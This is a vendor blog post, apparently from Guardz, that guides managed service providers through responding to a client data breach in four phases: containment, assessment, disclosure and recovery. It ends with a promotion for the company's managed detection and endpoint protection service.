Key takeaways
- Contain threats immediately: Isolate affected endpoints, restrict access to systems and applications, and revoke unnecessary third-party access to limit further damage.
- Investigate the breach thoroughly: Identify the attack type, entry point, affected assets, and scope of data exposure to determine root cause and next steps.
- Communicate with transparency: Coordinate with internal stakeholders and provide customers with clear, timely updates that meet legal and compliance requirements.
- Focus on remediation and recovery: Patch vulnerabilities, reset credentials, restore systems from trusted backups, and document all actions taken.
It happened.
Attackers successfully breached one of your client’s critical assets and infrastructure.
Time seems to stand still.
The C-level is in a panicked frenzy. The security team is in chaos mode. Angry emails from customers are flooding your inbox. Legal and PR teams are scrambling to draft statements that won’t further damage the brand. And you, the trusted MSP, are expected to have answers and an immediate action plan.
Breathe. You’re not alone. A recent survey found that 76% of MSPs spotted a cyberattack on their infrastructure within the last 12 months. Every passing minute post-breach is precious.
We’re going to help guide you through the different phases of a breach, including the proactive steps you can take to ensure business continuity and regain trust with your customers.
Phase 1: Immediate Threat Containment
According to IBM, it takes organizations an average of 204 days to identify a data breach and 73 days to contain it. But let’s focus on the containment aspect because the breach has occurred, and time is now exceptionally limited before the attacker resumes their conquest. Regardless of organization size, begin from the endpoints and isolate or disconnect any affected devices from the corporate network, depending on the severity of the risk.
If a device is compromised, a malicious actor might run PowerShell processes that execute suspicious or obfuscated commands, modify sensitive files, dump stolen credentials on the dark web, or move laterally within the network to escalate privileges and gain deeper access to critical infrastructure. None of those options are good.
And speaking of access, that’s the next action item on the threat containment list. Access to cloud environments, productivity apps such as Monday and Slack, and corporate inboxes should be immediately restricted until credentials have been reset to minimize further damage.
Third parties pose a great risk, especially if they are still logged into corporate systems, shared cloud environments, or retain access to accounts. A study showed that unauthorized network access accounted for over 50% of publicly disclosed third-party breaches in 2024.
In a breach, all third parties should be thoroughly reassessed to ensure that they are under contract or employed by the organization before any access may be granted to them. Any accounts or access privileges belonging to third parties no longer contracted with the organization should be immediately revoked.
Take no chances here. When in doubt, restrict access.
Phase 2: Assessing the Breach
The next phase is to assess the attack. Take a step back and begin by asking questions. Here are a handful of questions an MSP must consider during this phase.
- What type of attack was it? (ransomware, phishing, etc.)
- How did the attacker initially gain access?
- When was the threat properly identified?
- How did the attacker bypass our existing security measures?
- Which endpoint was the catalyst (if that was the culprit)?
- What was the volume and class of data exfiltrated?
- Was it a former employee who still had access to the corporate network?
- Did we miss any warning signs in data logs?
- Was the attack confined to specific departments?
- How many customers were impacted by the breach?
Once the dots have been connected and conclusions drawn, an entire security reassessment and incident response strategy must be underway.
Access controls must be strengthened. Privileges limited. Third-party account access temporarily restricted. Security tool effectiveness reevaluated. Employee security awareness increased.
So much to do. So little time.
Make sure you brew a few pots of coffee or have access to a good Nespresso machine because you will spend every minute tracing back the root cause of the attack. It’s an intense, detailed process that demands focus, but has to be done.
Phase 3: Internal and External Communication
Now comes the part no one enjoys, disclosing the breach. As you can imagine, there will be a lot of potential setbacks and challenges in delivering the bad news, beyond the TechCrunch headlines.
A meeting must be set up with all internal stakeholders to ensure alignment. This includes the C-suite, IT department, PR, and customer support (they have to deal with a digital storm of angry complaints).
Communication is exceptionally time sensitive here, particularly with customers. Transparency is key. A carefully crafted message detailing the breach and its impact must be developed by a skilled PR firm that has dealt with these types of security incidents. They’re also instrumental in protecting brand reputation.
The email should be sent out only after consulting with legal and compliance teams to ensure all regulatory requirements are met. The last surprise you need is an unexpected regulatory fine in your inbox. More importantly, the email should provide clear guidance on the next steps for affected parties, reassuring them that corrective actions are being taken.
This step can mean the difference between customer loyalty and attrition. A study showed that 65% of data breach victims lost trust in an organization after a data breach.
Choose each word carefully.
Phase 4: Remediation and Recovery
The final step post-breach is remediation. That might involve patching vulnerabilities that have been exploited, resetting passwords, reconfiguring access controls, and restoring systems. This process may take longer, depending on the scope of the breach.
Data backup and recovery are critical. Restore any databases or file systems that were corrupted during the attack. If the compromised systems cannot be safely restored, the best bet would be to wipe the affected machines and reinstall the operating system from trusted sources.
Compliance is another topic.
Regulatory fines might be looming on the horizon, once again depending on the scope of the breach and the impact on customer data privacy. GDPR mandates that affected individuals must be informed within 72 hours of a breach if personal data has been compromised. Make sure you have everything documented. Be transparent.
There are many security measures you can implement to prevent a breach or minimize its blast radius, but one thing every MSP must have is cyber insurance, especially for moments like this. Liability is an expensive matter.
Why put yourself or your clients through that risk?
Unified MDR + EDR Protection with Guardz
A data breach can happen in seconds, but with the right security controls, it doesn’t have to become a disaster.
Guardz equips MSPs with a fully managed 24/7 MDR service and industry-leading EDR powered by SentinelOne, all built into a unified platform designed specifically for the needs of SMBs. When attacks happen, Guardz delivers real-time detection, rapid response, and expert-led containment so you don’t have to face it alone.
Our platform goes beyond alerting. It proactively hunts threats, automates endpoint isolation, and gives your team the visibility and control they need to stop attacks fast. Whether it’s ransomware, credential theft, or lateral movement, Guardz ensures your clients stay protected and your reputation stays intact.
Every second counts during a breach. Guardz helps you act faster, smarter, and with confidence.
